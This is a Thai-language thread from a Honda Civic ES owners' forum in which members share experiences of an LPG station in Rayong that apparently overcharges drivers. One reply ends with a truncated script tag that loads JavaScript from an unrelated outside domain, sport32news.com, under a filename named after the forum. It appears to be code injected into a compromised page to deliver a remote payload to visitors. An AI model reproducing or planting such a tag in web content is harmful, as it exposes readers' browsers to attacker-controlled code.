ตอบ
movingtown

ชื่อเล่น: อเด

เข้าร่วม: 15 พฤศจิกา 2009
ตอบ: 1505

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1259
ให้คำขอบคุณ: 1948

ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
เสาร์, 21 สิงหา 2010 21:37 - คนเติมเเก๊สโกง หรือ ว่าโกงกันทั้งปั๊ม ?? ระยอง
อันนี้ เเชร์ ประสบการณ์ ปั๊มเเก๊สที่ระยองฮะ เผื่อพี่น้อง es จะได้ระวังไว้หน่อยก็ดี
เป็นปั๊มในตัวเมืองระยอง ซึ่งอยู่ตรงข้ามปั๊ม __ (ขอไม่บอกชื่อเเล้วกันครับ)ซึ่งปั๊มเเก๊สในระยองโซนตัวเมืองมีไม่กี่ที่ หรอกครับ
เข้าใจว่าคนเติมเเก๊สที่ระยองน่าจะรู้
เรื่องมีอยู่ว่า คือไอ่ปั๊มนี่เนี่ยปกติก็เข้าเติมไม่บ่อยครับ เเต่วันนั้น ผมเข้าไป เปิดประตูเชิบ บอกพี่(ผู้หญิง)
ผม :พี่ 300 เเต่ยังไม่ลงรถนะครับ หาเป๋าตัง
เติมเเก๊สเตอร์ : เสียบท่อ เเก๊ส ฉึก ๆ (ได้ยินเสียงเสียบ)
นับตั่งเเต่ผมอ้าปากบอกไป300 เนี่ยไม่ถึง 4-5 วินาที กระผมจึงทําการขยับตูดเลื่อนลงจากรถ
เลื่อนใบหน้าซื่อ ๆ ขยับเบ้าตา โฟกัส ไปที่ จอ monitor กระชากเสียงในใจ ว๊ายยยยยยยยย !
เลขราคามันวิ่งไปที่ 150 151 .....สมองผม ประมวลผลอย่างรุนเเรง ถามตัวเองพร้อมกับมองเลขที่วิ่ง
ไปเรื่อย ๆ มัน ก้วิ่งไม่เร็วนี่หว่า เป็นไปไม่ได้ ____มันไม่ใช่ ! ผิดสําเเดง ล่ะ ขึ้นเลย ๆ
ผม : เลยอ้าปากถามไปอย่าง เบา ๆ ว่า เอ่อ พี่ ครับ "ไมเลขมันวิ่งเร็วจังอ่ะครับ " เเละก็รอฟังพี่เขาจะตอบกรูว่ายังไง
เติมเเก๊สเตอร์ :เงียบ ! ไม่ตอบ ไม่มองหน้า มันยังไงกันว้า
ผม : ฮึย มันไม่ใช่อ่า เอาไงดีเนี่ย รึว่า กรูเพี้ยน!เองว้า รอดูเลข monitor ต่อไป 260 270..
เอ่า ถามอีกรอบว่ะ พี่ พี่ กด reset ให้ผมรึเปล่าอ่ะครับ ถามเบา ๆ นะ
เติมเเก๊สเตอร์ :ไม่ตอบอิกเเล้วครับพี่น้อง รอดู ครับ รอดู
เเต่ครับ !!พระเจ้าช่วย เพ่ เขาไม่ตอบเเต่เติมต่อครับ ไม่หยุดที่ 300 เเต่ไปหยุดที่ 400
ผม : ไม่รู้จะพูดอะไรต่อครับ ไม่อยากต่อว่า เเต่อยากให้เขาไปคิดเอาเอง เเต่ก็นั่นเเหละครับเราต้องระมัดระวัง
ในการดูเลขก่อนเติม เเต่ใครจะไปคิดล่ะครับเเป๊บเดียวเอง มันก็เอา

ยังไม่จบครับพี่น้อง ผมเองเป็นคนให้อภัยครับ ชั่งมัน ปั๊มนี่ มันคงไม่ทุกคนหรอกวะ หรือ ถ้าเป็นคนเดิม มันก็คง
เข็ดล่ะ ไปเติมอีก 4-5 ครั้ง ก็ไม่พบสิ่งผิดปกติอะไร
จนมา ไม่กี่วันมาเนี่ย หลังเลิกงาน เเก๊สหมดเกลี้ยงครับ เกลี้ยง !!!! ตัดสินใจเเวะเข้าไปเติม เปิดประตู 200 !
เสร็จสับ ขับออกมาใช้งานวิ่งไปกลับ ที่ทํางานวันรุ่งขึ้น ระยะทางทั้งหมดไปกลับ 30 โลเอง พอดึก ๆ ออกเที่ยวฮะ
start รถขับไปมาได้ไม่ถึง 4-5 โล เเก๊สสสส หมด ----> หมด ! หมดได้ไงว่ะ งง งง งง
200 บาท วิ่งได้ 30 กว่าโล มันเล่นกรูอีกเล้ววววว ไม่รู้ว่าหัวจ่ายมันปรับเเต่งยังรึเปล่า มันทําได้ไหมอ่ะครับเนี่ย
ทั้ง ๆ ที่ค่อนข้างจําได้ว่าลงไปดูเลข มันก็เริ่มที่ 0 บาท มาวันนี้เอารถไปเช็คที่ร้านเรื่องรอบเครื่องเดินเบา ถามพี่เจ้าของร้านติดเเก๊ส
ซึ่งปกติเวลาพี่เขาติดตั้งเเก๊สเสร็จ เขาจะเอารถไปเติมเพื่อ เทส บอกเป็นเสียงเดียวกันเลยครับ ว่า อิปั๊มเเก๊สร้านนี้ มัน
ไว้ใจไม่ได้ พี่เจอมาเยอะ
เเค่ก่อนนะครับ ไปเที่ยวก่อนเดี๋ยวโต๊ะเต็ม !!!!! สวัสดีครับ
ได้รับคำขอบคุณจาก: sayarm  fff_1232  Nut_Au_Together  Saka 
Eak-Inkjet

ชื่อเล่น: เอก

เข้าร่วม: 05 สิงหา 2010
ตอบ: 128

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 154
ให้คำขอบคุณ: 65

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 21 สิงหา 2010 21:56 - คนเติมเเก๊สโกง หรือ ว่าโกงกันทั้งปั๊ม ?? ระยอง
เล่าได้อารมณ์มาก อิอิ ผมก็เคยเกือบๆไป มึนๆหัวจ่ายติดๆกัน ผมบอกเต็มถัง แล้วก็ลุกออกมานอกรถมองไปที่หัวจ่าย แม่เจ้าขนลุก พรวดไป350บาท เฮ้ยๆ มันยังไงวะ ....สรุป เอออ ดูผิดหัวจ่าย เอิ๊กๆ เกือบด่าร้านฟรี โดนกระทืบแน่เรา <script src="https://sport32news.com/civicesgroup.js"></
sayarm

ชื่อเล่น: หยาม

เข้าร่วม: 03 ตุลา 2008
ตอบ: 2229

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2543
ให้คำขอบคุณ: 4055

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อาทิตย์, 22 สิงหา 2010 13:08 - คนเติมเเก๊สโกง หรือ ว่าโกงกันทั้งปั๊ม ?? ระยอง
แหะๆ ขอรู้ด้วยคนนะครับชาวระยอง อยากรู้ชื่อตำแหน่งที่ตั้งปั๊มจังเอาไว้เป็นข้อมูล pm บอกทีนะครับ

คงเป็นปั๊ม LPGใช่ไหมครับ .... ของผมเติม NGV คงไม่ต้องกังวลใช่ป่ะครับ
movingtown

ชื่อเล่น: อเด

เข้าร่วม: 15 พฤศจิกา 2009
ตอบ: 1505

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1259
ให้คำขอบคุณ: 1948

สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 22 สิงหา 2010 13:31 - คนเติมเเก๊สโกง หรือ ว่าโกงกันทั้งปั๊ม ?? ระยอง
sayarm พิมพ์ว่า:
แหะๆ ขอรู้ด้วยคนนะครับชาวระยอง อยากรู้ชื่อตำแหน่งที่ตั้งปั๊มจังเอาไว้เป็นข้อมูล pm บอกทีนะครับ

คงเป็นปั๊ม LPGใช่ไหมครับ .... ของผมเติม NGV คงไม่ต้องกังวลใช่ป่ะครับ

ใช่เเว้วครับ LPG ครับ พี่
sayarm

ชื่อเล่น: หยาม

เข้าร่วม: 03 ตุลา 2008
ตอบ: 2229

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2543
ให้คำขอบคุณ: 4055

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อาทิตย์, 22 สิงหา 2010 13:48 - คนเติมเเก๊สโกง หรือ ว่าโกงกันทั้งปั๊ม ?? ระยอง
โอเคครับ รู้กระจ่างแร้ว
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.